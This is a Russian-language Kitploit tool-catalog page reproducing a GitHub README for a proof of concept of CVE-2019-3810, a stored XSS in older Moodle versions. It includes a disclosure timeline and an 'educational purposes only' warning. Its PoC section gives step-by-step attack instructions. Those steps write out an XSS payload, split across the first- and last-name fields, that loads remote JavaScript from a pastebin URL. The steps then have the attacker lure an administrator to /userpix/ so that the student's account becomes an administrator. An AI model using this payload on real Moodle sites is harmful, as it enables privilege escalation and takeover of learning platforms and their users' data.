Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Moodle-CVE-2019-3810 — Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC для повышения привилегий (от студента до администратора) | Kitploit
Инструменты/GitHubGitHub/farisv/moodle-cve-2019-3810
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubfarisv/moodle-cve-2019-3810

Moodle-CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC для повышения привилегий (от студента до администратора)

Репозиторий
1725 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Moodle CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC для повышения привилегий (от студента до администратора). Это одна из прошлых ошибок, которую я обнаружил во время прошлого пентеста в академическом учреждении. На тот момент она была достаточно успешной, чтобы практически украсть права администратора и получить полный контроль над Moodle, используя всего одну простую ошибку.

Мы видим из истории git, что ошибка существовала с ранних версий Moodle (2003) и была исправлена только в 2019 году.

Хронология:

  • Декабрь 2018 - Сообщил об ошибке в Moodle
  • Январь 2019 - Выпущен патч
  • Апрель 2021 - Раскрытие PoC

WARNING

ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ. НЕ ИСПОЛЬЗУЙТЕ ЭКСПЛОЙТ ДЛЯ НЕЗАКОННЫХ ДЕЙСТВИЙ. АВТОР НЕ НЕСЕТ ОТВЕТСТВЕННОСТИ ЗА ЛЮБОЕ НЕПРАВИЛЬНОЕ ИСПОЛЬЗОВАНИЕ ИЛИ УЩЕРБ.

PoC

  1. Загрузите payload.js на pastebin или другой подобный сервис. Измените значение userid на свой собственный id. Допустим, URL будет https://pastebin.com/raw/xxxxxxxx.
  2. Войдите в свою студенческую учетную запись.
  3. Установите имя с " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. Установите фамилию с ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. Попросите администратора открыть страницу /userpix/ или поместите ссылку на эту страницу в свой пост и ждите.

В случае успеха ваша учетная запись будет добавлена как администратор.

Демонстрационное видео

Скачать инструмент